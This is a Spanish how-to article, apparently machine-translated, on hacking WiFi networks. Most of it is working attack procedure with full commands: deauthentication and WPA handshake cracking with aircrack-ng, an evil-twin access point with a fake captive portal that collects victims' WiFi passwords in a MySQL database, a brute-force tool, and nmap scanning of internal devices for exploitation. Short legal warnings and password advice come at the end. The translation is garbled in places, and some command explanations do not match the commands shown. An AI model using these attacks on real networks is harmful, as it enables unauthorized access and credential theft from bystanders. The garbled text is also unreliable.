En este artículo, discutiremos las mejores formas de piratear una red WiFi y qué podemos hacer para evitar ser víctimas de los hackeos de WiFi.
Se requieren herramientas de hardware.
Se requiere software.
Como hackear wifi.
una. usando un apretón de manos de 4 vías.
b. usando el ataque del gemelo malvado.
C. usando fuerza bruta directa.
d. usando un apretón de manos de 2 vías.
¿Qué hacer después de hackear wifi?
¿Cómo prevenir este tipo de ataques?
problemas y problemas que se enfrentan en tales ataques.
El principal requisito de hardware es un adaptador WiFi que admita el modo de monitor. El preferido es un adaptador Alfa porque es fácil de usar en Kali Linux.
Otra herramienta que puede usar es una raspberry pi para descifrar contraseñas o puede usar una computadora separada para el mismo uso.
Existe una amplia gama de software que puede funcionar para hackear WiFi. Voy a enumerar algunos:
Estas son las herramientas utilizadas principalmente en la piratería de WiFi. Los primeros 4 son populares pero el último
batch_wifi_brute_forcer es una herramienta desarrollada por TUX que utiliza la utilidad de Windows, que es netsh, que se utiliza para la conexión wifi en Windows. Discutiré el funcionamiento de esta herramienta en detalle más adelante en el artículo. El resto de las herramientas funcionan para capturar el archivo hash pcap y cap y descifrarlos usando hashcat, aircrack-ng y algunas otras herramientas.
El protocolo de enlace de 4 vías captura el hash WPA o WPA2 al interceptar el tráfico del punto de acceso y una máquina conectada con el punto de acceso de destino.
Podemos lograr esto atacando simultáneamente con DOS la máquina conectada para que se produzca la autenticación y el hash se intercambie entre sí, en este caso, el punto de acceso y la máquina conectada.
En este tipo de ataque, usamos las herramientas que vienen con la suite aircrack-ng en el lado del software, y en el lado del hardware, necesitamos un adaptador wifi que admita el modo de monitor.
Al comienzo del ataque, primero debemos poner el adaptador en modo monitor usando el módulo airmon-ng .
$ sudo airmon-ng
El comando anterior enumerará todos los adaptadores wifi.
$ sudo airmon-ng start wlan0
Este comando pondrá su módulo en modo monitor, pero es importante recordar qué nombre tiene asignado su adaptador, ya que un nombre puede diferir (solo marque una vez).
El siguiente paso es descubrir el SSID de destino. Estoy usando una imagen en línea, ya que no puedo usar la mía por razones obvias. Espero que lo entiendas.
Estamos utilizando el módulo airodump-ng para buscar los objetivos.
$ sudo airodump-ng wlan0mon
El comando anterior mostrará las señales de todos los puntos de acceso cercanos.
Ahora, después de decidir el objetivo, debe comenzar a descubrir los dispositivos conectados al punto de acceso. Ahora debe concentrarse en algunos datos de la imagen de arriba, primero el BSSID del punto de acceso el ESSID del punto de acceso el ENC o el cifrado y el canal que es CH
Estos son los datos necesarios para el siguiente proceso.
$ sudo aireplay-ng --fakeauth 0 -e "your network ESSID" -a 00:01:02:03:04:05 -o test.cap wlan0mon
En el ataque anterior, estamos usando el módulo aireplay . Usando -c, podemos especificar el canal en el que está trabajando el objetivo. Podemos usarlo para especificar el ESSID del punto de acceso -a. Podemos especificar el BSSID del objetivo y usando -fakeauth podemos especificar el vector de ataque que es un módulo de autenticación falso y por último especificamos el adaptador wifi que está en modo monitor y usando -o podemos especificar el archivo de salida que aquí he especificado prueba. tapa para facilitar el acceso.
Ahora descifrar el paquete recopilado, lo cual es fácil en este caso.
$ sudo aircrack-ng test.cap -w passwords.txt
En el comando anterior, proporcionará los archivos de captura, y usando -w proporcionaremos el archivo de contraseña y, si tiene suerte, la contraseña estará allí en su archivo de contraseña y la obtendrá al descifrarla.
O si no está interesado en que DE autentique el objetivo, puede usar este ataque.
$ sudo aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 -o test.cap wlan0mon
Y luego descifrar el archivo de captura.
Podemos concluir este ataque diciéndole o más precisamente advirtiéndole que capturar el paquete es la parte fácil y descifrar el hash lo deprimirá y lo digo en serio.
Dejando eso de lado, este es un método efectivo para hackear wifi.
Un ataque gemelo malvado es un ataque en el que el hacker finge ser el punto de acceso real y engaña al usuario para que se conecte y proporcione la contraseña del punto de acceso real, escucha la contraseña entre la conversación. La principal ventaja de este ataque es que no necesita descifrar contraseñas, ya que obtendrá la contraseña de texto sin formato en lugar de un hash.
Para este ataque, lo haremos manualmente usando un adaptador de modo monitor.
Primero, instale los paquetes necesarios: -
$ sudo apt install hostapd dnsmasq apache2
En segundo lugar, ponga el adaptador en modo monitor:-
$ sudo airmon-ng start wlan0
En tercer lugar, cree un directorio en la página de inicio de su escritorio:
$ sudo mkdir ~/fap && cd ~/fap
A continuación, configure el archivo hostapd.conf: -
$ sudo nano hostapd.conf -----------------<nano>----------------- interface=[INTERFACE NAME] driver=nl80211 ssid=[WiFi NAME] hw_mode=g channel=8 macaddr_acl=0 ignore_broadcast_ssid=0 ----------------------------------------
Ahora, en el archivo de configuración anterior, tenemos que especificar la interfaz del modo de monitor en la sección de interfaz y especificar el SSID de destino en la sección SSID después de cambiar, solo haga ctrl+x , escriba y e ingrese en consecuencia para guardar el archivo.
Quinta configuración del archivo dnsmasq.conf:-
$ sudo nano dnsmasq.conf -----------------<nano>----------------- interface=[INTERFACE NAME] dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h dhcp-option=3, 192.168.1.1 dhcp-option=6, 192.168.1.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 ----------------------------------------
Y en esto, solo necesita especificar el nombre de los adaptadores de modo de monitor, eso es todo.
Sexto, cree la tabla de enrutamiento y las puertas de enlace: -
$ sudo ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0 $ sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Séptimo, cree una red DHCP y proporcione acceso a Internet a las iptables: -
$ sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE $ sudo iptables --append FORWARD --in-interface wlan0mon -j ACCEPT $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Inicie la base de datos SQL para almacenar la contraseña y el usuario, etc. para su uso posterior.
$ service mysql start $ mysql [Database]> create database fap; [Database]> create user fapuser; [Database]> grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword'; [Database]> use fap; [Database]> create table wpa_keys(password1 varchar(40), password2 varchar(40)); [Database]> ALTER DATABASE fap CHARACTER SET 'utf8'; [Database]> select * from wpa_keys;
Portal cautivo para engañar al usuario wifi: -
Descargue el sitio web del marco web que desee, pero debería parecer legítimo.
Ahora para crear una carpeta en /var/www/html/ :-
$ sudo rm -rf /var/www/html/* $ mv ~/Downloads/fap.zip /var/www/html $ cd /var/www/html $ unzip fap.zip $ service apache2 start
Ahora, para iniciar el ataque, debemos volver a la carpeta fap en el inicio, que se encuentra en el directorio de inicio.
$ cd ~/fap $ hostapd hostapd.conf $ dnsmasq -C dnsmasq.conf -d $ cd /var/www/html/ $ dnsspoof -i wlan0mon
Ahora solo necesita DOS el punto de acceso real usando su herramienta favorita y esperar a que el usuario se conecte a usted.
comandos copiados directamente de los recursos de zsecurity .
Ahora, después de que se conecte a usted, se le pedirá que inicie sesión donde tiene que ingresar la contraseña de wifi donde, si es un usuario de wifi estúpido, lo hará sin dudarlo y la contraseña se almacenará en su base de datos MySQL. Este es un ataque realmente poderoso y facilita la piratería de wifi.
Direct Bruteforce es un método es una técnica que me encanta principalmente porque he trabajado en la herramienta y en segundo lugar es fácil de usar.
Es Windows solo por ahora y usa la utilidad de línea de comandos netsh para piratear la red wifi, escanea las redes cercanas y, usando el SSID del objetivo, usa un archivo YAML de conexión que se crea temporalmente para realizar la autenticación de la conexión y si es correcto se conectará a la red.
Usaré la herramienta batch_wifi_brute_forcer que uso personalmente y funciona mejor y es muy sencilla.
El comando es simple, simplemente ingrese wifiscan para escanear las redes, seleccione una red de la lista mostrada y luego de ese tipo de ataque.
[wifi]> wifiscan [wifi]>( select network ) [wifi]> attack
Listo, eso es todo para agregar más contraseñas a la lista de contraseñas, puede agregar un archivo de contraseña en la carpeta BF_Files pero asegúrese de cambiarle el nombre passfile.txt ya que es el predeterminado.
Esto es lento y con errores, pero es preciso y efectivo en todas las formas posibles. En comparación, esto es como un ataque DDOS lento de Loris pero para wifi.
Si desea descargar la herramienta desde batch_wifi_brute_forcer .
Esto es similar al ataque Evil-Twin, pero este es un tipo diferente de ataque que tiene el descifrado de contraseñas también en este ataque. En este ataque, está engañando al usuario para que se conecte a su red y durante el proceso de negociación de 4 vías solo capturaremos el hash que proporciona para conectarse a su red y en este ataque usaremos aircrack-ng y Wireshark. usará aircrack-ng para eliminar la autenticación del usuario y usará Wireshark para filtrar y capturar los paquetes que queremos.
En este ataque, primero nos enfocaremos en configurar un punto de acceso en su teléfono móvil con el mismo SSID de la red que desea piratear y luego, usando Wireshark y aircrack-ng, filtraremos los paquetes y los descifraremos.
Primero:-
Pon tu adaptador wifi en modo monitor.
$ sudo airmon-ng start wlan0mon
Segundo:-
Necesitamos descubrir su punto de acceso móvil.
$ sudo airodump-ng wlan0mon (this will show all the nearby networks and access points)
Ahora, en los datos recibidos, debe copiar el canal en el que se está ejecutando su punto de acceso y debe copiar el BSSID y el ESSID, luego puede continuar con los siguientes pasos.
Tercero:-
Necesitamos comenzar a desautorizar la red real para desconectar a las personas de conectarse a ella, en lugar de conectarse a su punto de acceso falso y, al mismo tiempo, comenzar a escuchar Wireshark en ese canal. Para este ejemplo, estoy usando el canal 10 como ejemplo.
$ sudo airodump-ng wlan0mon -c 10 & wireshark
Esto iniciará la escucha de Wireshark en el canal 10. Ahora debe buscar el marco de la baliza
que tiene el ESSID de su punto de acceso y ahora en ese paquete busque la dirección del transmisor y luego ingrese esto como su filtro para filtrar los paquetes entrantes y salientes de ese marco de baliza.
wlan.ta == <transmission address> || wlan.da == <transmission address>
Después de esto, puede ver todos los paquetes entrantes y salientes de la baliza.
Ahora, una vez que la víctima intente conectarse a la red, puede capturarla usando Wireshark.
Escriba el siguiente comando para filtrar la comunicación de contraseña entre la baliza y la víctima.
eapol || wlan.ta == <transmission address> || wlan.da == <transmission address>
Esto filtrará el eapol o el hash correcto de la red wifi original.
Ahora puede guardar la captura en formato pcap utilizando Exportar paquetes especificados y exportar los paquetes desde el filtro.
Ahora es fácil descifrar la contraseña utilizando un software de descifrado como aircrack-ng, rainbow crack, hashcat, omphcrack, etc.
Este es un método eficaz, ya que no es necesario realizar muchas desautorizaciones para obtener la contraseña, solo use un truco simple para engañar a los usuarios.
Una vez que haya obtenido acceso a la red, puede acceder a todos los dispositivos conectados en la red interna, esto es fácil, ya que solo necesita nmap para escanear toda la red para enumerar los puertos abiertos en las máquinas conectadas a la red, por ejemplo, si hay 20 sistemas diferentes conectados a un enrutador que tiene una puerta de enlace 192.168.1.1 y tiene la IP de 192.168.1.20 y, de forma predeterminada, puede haber un máximo de 200 dispositivos conectados al enrutador que es 192.168.1.200 para que pueda usar este comando para buscar y enumerar las máquinas.
$ sudo nmap -sV 192.168.1.1-200
Esto escaneará la red interna y mostrará todos los puertos abiertos de todas las máquinas conectadas al punto de acceso.
Después de esto, es su turno de escanear y encontrar un puerto o servicio vulnerable y explotarlo y aprovechar al máximo la máquina de la persona.
Esto puede ser fácil incluso para un principiante, ya que es una enumeración y explotación básicas.
Explicaré cómo podemos hacer esto con un ejemplo simple. Puede seguir junto con su configuración de práctica.
Objetivo: busca y selecciona tu target
Primero averiguaré mi puerta de enlace IP y subred.
$ ifconfig
puede averiguar su puerta de enlace predeterminada y cómo está programada la subred, por ahora asumiré que es 192.168.1.1 y su IP es 192.168.1.20.
Ejecute este comando para descubrir todos los dispositivos conectados.
$ sudo nmap 192.168.1.1/100
El comando anterior enumerará todos los sistemas de red abiertos.
Consideremos que nuestra IP objetivo es 192.168.1.10. Vamos a enumerar ese sistema.
$ nmap -sV -A -p- 192.168.1.10
El comando anterior mostrará la información básica sobre el sistema de destino y, de esta manera, puede enumerar más el sistema.
En consecuencia, puede encontrar el camino correcto y piratear su sistema de destino en la configuración de su práctica.
Si no quieres verte en la cárcel por 3-10 años sin la opción de fianza y otro 1 año sin dispositivos electrónicos con internet, entonces no hagas cosas que puedan causarte daño a ti y a otros, también aprende a hackear pero éticamente. Para mí, la segunda opción sin electrónica con internet me asusta más.
Para evitar este tipo de ataques, lo más básico que puede hacer es usar una contraseña larga y compleja. Si tiene trabajos de alta prioridad en su sistema, no le hará daño tener una contraseña enorme, ya que lo protegerá de la ira de su jefe por perderlos. datos clasificados.
En el lado de la red, puede actualizar o actualizar su protección de firewall y reducir el reenvío de puertos a muchos puertos, lo que reduce la posibilidad de ser pirateado internamente.
En el lado de la computadora personal, puede reducir los servicios o actualizar los servicios para obtener la última versión parcheada del servicio y los servidores.
Estos son el nivel más básico de prevención que puede seguir, pero hay otros más avanzados, pero no quiero comerme la cabeza aumentando la longitud de este artículo también.
El problema principal es el descifrado de contraseñas, que es largo, minucioso y nos mata desde adentro para descifrar la contraseña, ya que necesitamos proporcionar el archivo de contraseñas, que probablemente tenga un tamaño de 2-3 gigas y contenga contraseñas de aproximadamente 3 crore contraseñas en total y toma 2 -3 días para completarse totalmente y es posible que no funcione también, así que sí, es frustrante.
El segundo problema es que es largo y si perdemos un solo paso, el ataque completo no funcionará o incluso comenzará desde el principio.
O lo peor es que la persona que tiene una contraseña larga y fuerte te lo pone difícil descifrarla.
Concluyo este artículo diciéndole que debe aprender a piratear pero de manera ética y asegurarse de no piratear a una persona del gobierno tras las rejas, así que tenga cuidado.
Estoy escribiendo artículos sobre varios temas de piratería, pero no sé cuál es el más requerido en las tendencias actuales en el campo de la seguridad, por lo que si tiene algún tema sobre el que desee artículos, no dude en contactarme a continuación: enlaces dados.
Y estoy planeando escribir un tutorial para intentar hackearme las habitaciones, así que si tienes alguna sugerencia, contáctame.
** Zsecurity ** Y eso es todo.